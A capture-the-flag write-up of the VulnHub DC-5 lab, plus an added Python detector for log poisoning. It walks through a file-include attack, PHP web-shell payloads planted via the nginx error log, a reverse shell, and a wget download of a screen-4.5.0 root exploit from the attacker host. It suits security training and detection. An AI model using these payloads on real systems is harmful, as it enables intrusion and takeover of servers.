
2024/12/23 17:03:24  Source: https://blog.csdn.net/weixin_46099552/article/details/143459471

https://www.vulnhub.com/entry/dc-5,314/

Host discovery and port scanning

  1. Detect live hosts; .175 is the target machine

    nmap -sP 192.168.75.0/24
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:27 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00022s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00018s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.175
    Host is up (0.00016s latency).
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00015s latency).
    MAC Address: 00:50:56:FE:CA:7A (VMware)
    Nmap scan report for 192.168.75.151
    Host is up.
    
  2. Scan all open ports on the target

    nmap -sT -min-rate 10000 -p- 192.168.75.175
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:28 CST
    Nmap scan report for 192.168.75.175
    Host is up (0.00040s latency).
    Not shown: 65532 closed tcp ports (conn-refused)
    PORT      STATE SERVICE
    80/tcp    open  http
    111/tcp   open  rpcbind
    57203/tcp open  unknown
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    
  3. Scan service versions and the OS version

    nmap -sV -sT -O -p80,111,57203 192.168.75.175
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:30 CST
    Nmap scan report for 192.168.75.175
    Host is up (0.00047s latency).

    PORT      STATE SERVICE VERSION
    80/tcp    open  http    nginx 1.6.2
    111/tcp   open  rpcbind 2-4 (RPC #100000)
    57203/tcp open  status  1 (RPC #100024)
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    
  4. Scan for vulnerabilities

    nmap -script=vuln -p 80,111,57203 192.168.75.175
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:33 CST
    Nmap scan report for 192.168.75.175
    Host is up (0.00052s latency).

    PORT      STATE SERVICE
    80/tcp    open  http
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-csrf:
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.175
    |   Found the following possible CSRF vulnerabilities:
    |
    |     Path: http://192.168.75.175:80/contact.php
    |     Form id: fname
    |_    Form action: thankyou.php
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    111/tcp   open  rpcbind
    57203/tcp open  unknown
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    

    Nothing substantive here; as usual, we start from port 80.

Web penetration

  1. Visit the home page


  2. Scan directories; nothing worth attention

    dirsearch -u 192.168.75.175 -x 403
    [13:40:35] Starting:
    [13:40:56] 200 -    4KB - /contact.php
    [13:40:56] 301 -  184B  - /css  ->  http://192.168.75.175/css/
    [13:41:00] 200 -    6KB - /faq.php
    [13:41:01] 200 -   17B  - /footer.php
    [13:41:03] 301 -  184B  - /images  ->  http://192.168.75.175/images/
    [13:41:25] 200 -  852B  - /thankyou.php
    
  3. Look at the hint on the official page: "This particular entry point may be difficult to identify, but it does exist. You need to look for something unusual (something that changes when the page is refreshed)." We notice that the year shown in the footer is different every time we submit the form.


    The entry point is probably in the page footer.

  4. Visit /footer.php; the year also changes on every refresh, so the thankyou page includes footer.php, and there may be a parameter that controls which file is included. Use wfuzz to fuzz for the parameter name.

    # Try to include /etc/passwd
    wfuzz -c -w /usr/share/wfuzz/wordlist/general/big.txt --hh 851 'http://192.168.75.175/thankyou.php?FUZZ=/etc/passwd'
    ********************************************************
    * Wfuzz 3.1.0 - The Web Fuzzer                         *
    ********************************************************

    Target: http://192.168.75.175/thankyou.php?FUZZ=/etc/passwd
    Total requests: 3024

    =====================================================================
    ID           Response   Lines    Word       Chars       Payload
    =====================================================================

    000001053:   200        70 L     104 W      2319 Ch     "file"

    Fuzzing turns up the parameter file, which is probably what the page uses to include files. /etc/passwd is included successfully.


  5. Since there is no login page, including /etc/passwd is of no use. Following the usual CTF approach, we try including a log file instead.

    /thankyou.php?file=/var/log/nginx/access.log
    

    Inclusion succeeded!

  6. Inserting PHP code through the User-Agent did not work. In the end, we can place PHP code in the file parameter so that the include fails and the statement is left behind in error.log.

    (From here on the target IP changes to 176; I broke the previous target machine by messing around with it.)

    http://192.168.75.176/thankyou.php?file=<?php system($_POST['a']); ?>
    

    Then include error.log; it is enough that <?php @eval($_POST['b']); ?> is present in it.

    2024/11/03 04:37:36 [error] 557#0: *63 FastCGI sent in stderr: "PHP message: PHP Warning:  include(<?php @eval($_POST['b']); ?>): failed to open stream: No such file or directory in /var/www/html/thankyou.php on line 44
    PHP message: PHP Warning:  include(): Failed opening '<?php @eval($_POST['b']); ?>' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/html/thankyou.php on line 44" while reading response header from upstream, client: 192.168.75.1, server: _, request: "GET /thankyou.php?file= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.75.176", referrer: "http://192.168.75.176/thankyou.ph"
    

    Connect with AntSword (the password is b, matching your POST parameter name), then open a terminal in AntSword and spawn a reverse shell.

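    As an added example (not part of the original write-up), a small Python detector for the two traces this step leaves in nginx logs: PHP open tags arriving in the request line or User-Agent, and query values reaching for log files or /etc/passwd. It assumes nginx's default combined log format, and the sample lines are constructed to mirror the steps above.

```python
import re
from urllib.parse import unquote_plus

# nginx "combined" format: client ident user [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)                      # PHP open tag
LFI_RE = re.compile(r'\.\./|/etc/passwd|/var/log/|php://', re.IGNORECASE)  # LFI probing

# Constructed sample lines (not taken from the original post) that mirror the write-up:
# a log-file include, a PHP tag in the file= value, a PHP tag in the User-Agent, and a clean hit.
SAMPLE_ACCESS_LOG = """\
192.168.75.1 - - [03/Nov/2024:04:37:30 +0000] "GET /thankyou.php?file=/var/log/nginx/access.log HTTP/1.1" 200 2319 "-" "Mozilla/5.0"
192.168.75.1 - - [03/Nov/2024:04:37:36 +0000] "GET /thankyou.php?file=%3C%3Fphp%20system%28%24_POST%5B%27a%27%5D%29%3B%20%3F%3E HTTP/1.1" 200 851 "-" "Mozilla/5.0"
192.168.75.1 - - [03/Nov/2024:04:38:01 +0000] "GET /faq.php HTTP/1.1" 200 6144 "-" "<?php @eval($_POST['b']); ?>"
192.168.75.1 - - [03/Nov/2024:04:38:05 +0000] "GET /contact.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""


def scan_access_log(text):
    """Return one finding per suspicious line: {'line': n, 'client': ip, 'reasons': [...]}."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(raw)
        if not m:
            continue                      # not a combined-format line; skip it
        # Percent-decode so "%3C%3Fphp" is inspected as "<?php"
        request = unquote_plus(m.group('request'))
        ua = unquote_plus(m.group('ua'))
        reasons = []
        if PHP_TAG_RE.search(request):
            reasons.append('php-tag-in-request')     # poisoning via file= / URI
        if PHP_TAG_RE.search(ua):
            reasons.append('php-tag-in-user-agent')  # poisoning via UA header
        if LFI_RE.search(request):
            reasons.append('lfi-probe')              # reaching for logs or /etc/passwd
        if reasons:
            findings.append({'line': n, 'client': m.group('client'), 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {f['line']} from {f['client']}: {', '.join(f['reasons'])}")
```

    On a real host the same patterns should also be applied to the php-fpm error log, since that is where the failed include above lands.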

Privilege escalation

  1. Check current privileges

    (www-data:/var/www) $ whoami
    www-data
    (www-data:/var/www) $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    (www-data:/var/www) $ uname -a
    Linux dc-5 3.16.0-4-amd64 #1 SMP Debian 3.16.51-2 (2017-12-03) x86_64 GNU/Linux
    
  2. Look for sensitive files (SUID binaries)

    (www-data:/var/www) $ find / -perm -u=s -type f 2>/dev/null
    /bin/su
    /bin/mount
    /bin/umount
    /bin/screen-4.5.0
    /usr/bin/gpasswd
    /usr/bin/procmail
    /usr/bin/at
    /usr/bin/passwd
    /usr/bin/chfn
    /usr/bin/newgrp
    /usr/bin/chsh
    /usr/lib/openssh/ssh-keysign
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/eject/dmcrypt-get-device
    /usr/sbin/exim4
    /sbin/mount.nfs
    

    We find screen-4.5.0.

  3. Check whether screen-4.5.0 has a known privilege escalation exploit

    searchsploit screen 4.5.0
    ---------------------------------------------------- ----------------------
     Exploit Title                                      |  Path
    ---------------------------------------------------- ----------------------
    GNU Screen 4.5.0 - Local Privilege Escalation       | linux/local/41154.sh
    GNU Screen 4.5.0 - Local Privilege Escalation (PoC) | linux/local/41152.txt
    ---------------------------------------------------- ----------------------
    

    Copy linux/local/41154.sh and download it onto the target.

  4. Run the script

    $ wget http://192.168.75.151/41154.sh
    converted 'http://192.168.75.151/41154.sh' (ANSI_X3.4-1968) -> 'http://192.168.75.151/41154.sh' (UTF-8)
    --2024-11-03 05:11:00--  http://192.168.75.151/41154.sh
    Connecting to 192.168.75.151:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 1149 (1.1K) [application/x-sh]
    Saving to: '41154.sh'

    41154.sh            100%[=====================>]   1.12K  --.-KB/s   in 0s

    2024-11-03 05:11:00 (8.86 MB/s) - '41154.sh' saved [1149/1149]

    $ chmod u+x 41154.sh

    $ ./41154.sh
    ~ gnu/screenroot ~
    [+] First, we create our shell and library...
    [+] Now we create our /etc/ld.so.preload file...
    [+] Triggering...
    ' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
    [+] done!
    No Sockets found in /tmp/screens/S-www-data.

    # id
    id
    uid=0(root) gid=0(root) groups=0(root),33(www-data)
    # whoiam
    whoiam
    sh: 2: whoiam: not found
    # whoami
    whoami
    root
    

    Privilege escalation succeeded; read the flag file.

    # cat thisistheflag.txt
    cat thisistheflag.txt
    888b    888 d8b                                                      888      888 888 888
    8888b   888 Y8P                                                      888      888 888 888
    88888b  888                                                          888      888 888 888
    888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888
    888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888
    888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P
    888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "
    888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888

    Once again, a big thanks to all those who do these little challenges,
    and especially all those who give me feedback - again, it's all greatly
    appreciated.  :-)

    I also want to send a big thanks to all those who find the vulnerabilities
    and create the exploits that make these challenges possible.
